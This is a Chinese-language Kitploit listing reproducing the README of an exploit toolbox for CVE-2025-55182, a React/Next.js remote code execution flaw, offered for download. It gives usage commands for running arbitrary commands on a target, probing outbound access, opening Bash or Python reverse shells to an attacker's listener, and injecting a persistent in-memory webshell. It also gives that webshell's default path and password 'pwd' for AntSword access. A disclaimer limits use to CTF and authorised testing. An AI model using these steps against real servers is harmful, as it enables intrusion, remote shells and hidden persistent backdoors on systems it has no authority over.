Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-55182-Toolbox — 自动化利用工具,针对CVE-2025-55182(React/Next.js远程代码执行),支持命令执行、出站检测、交互式反向shell及持久内存webshell注入,适用于授权渗透测试与CTF挑战。 | Kitploit
工具/GitHubGitHub/lamaper/cve-2025-55182-toolbox
持久化机制漏洞利用Web应用程序漏洞利用后渗透利用CTF渗透测试命令与控制红队Payload 开发
GitHublamaper/cve-2025-55182-toolbox

CVE-2025-55182-Toolbox

自动化利用工具,针对CVE-2025-55182(React/Next.js远程代码执行),支持命令执行、出站检测、交互式反向shell及持久内存webshell注入,适用于授权渗透测试与CTF挑战。

148个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
分享

React2Shell: CVE-2025-55182 综合利用工具

Author: lamaper / BITs2Sys

Version: 1.0.1

License: MIT

📝 工具简介

本工具是一款专门针对 CVE-2025-55182(React Server Components / Next.js 原型链污染导致 RCE)的自动化渗透测试工具。该工具专为 CTF 比赛和已授权的安服项目设计,集成了漏洞验证、出网探测、反弹 Shell 以及内存马注入等多项功能。

🚀 核心功能

  • 一键命令执行 (--cmd):利用 NEXT_REDIRECT 异常机制,精准回传 Base64 编码的命令执行结果。
  • 出网状态探测 (--check-outbound):自动化测试靶机对 DNS、HTTP 及 ICMP 的访问能力,辅助决策攻击路径。
  • 交互式反弹 Shell (--shell):内置 Bash 和 Python3 两种反弹模式,支持异步执行,防止 HTTP 请求挂起。
  • 持久化内存马 (--inject-ms):通过劫持 Node.js http.Server 事件分发机制注入内存马,无文件残留,支持持久化控制。
  • 内存马交互接口 (--ms-cmd):独立于漏洞触发路径的交互模式,注入成功后可直接通过后门执行命令。

🛠️ 安装与依赖

本工具基于 Python 3 开发,仅需安装 requests 库。

root@kitploit:~
pip install requests

📖 使用指南

0.探测漏洞是否存在

https://github.com/assetnote/react2shell-scanner 是一个很好用的探测工具

1. 基础命令执行

直接获取靶机信息:

root@kitploit:~
python exploit.py --url http://target.com/ --cmd "id"
python exploit.py --url http://target.com/ --cmd "cat /flag"

2. 出网探测

在尝试反弹 Shell 前,确认靶机是否能连接外网:

root@kitploit:~
python exploit.py --url http://target.com/ --check-outbound

3. 反弹 Shell

Bash 模式:

root@kitploit:~
# 攻击机执行监听: nc -lvnp 4444
python exploit.py --url http://target.com/ --shell bash --ip <你的IP> --port 4444

Python 模式:

root@kitploit:~
python exploit.py --url http://target.com/ --shell python --ip <你的IP> --port 4444

4. 内存马利用 (持久化)

注入内存马:

root@kitploit:~
python exploit.py --url http://target.com/ --inject-ms

通过内存马执行命令(注入成功后使用):

root@kitploit:~
python exploit.py --url http://target.com/ --ms-cmd "whoami"

注:内存马默认挂载路径为 /?pass,通过 POST 提交 pwd 参数触发。

通过中国蚁剑(AntSword)连接:

连接密码:pwd,连接方式CMDLINUX

⚠️ 免责声明

本工具仅用于 法律允许范围内 的安全研究、CTF 比赛以及经授权的渗透测试。严禁将其用于非法攻击。使用本工具产生的一切后果由使用者自行承担。


下载工具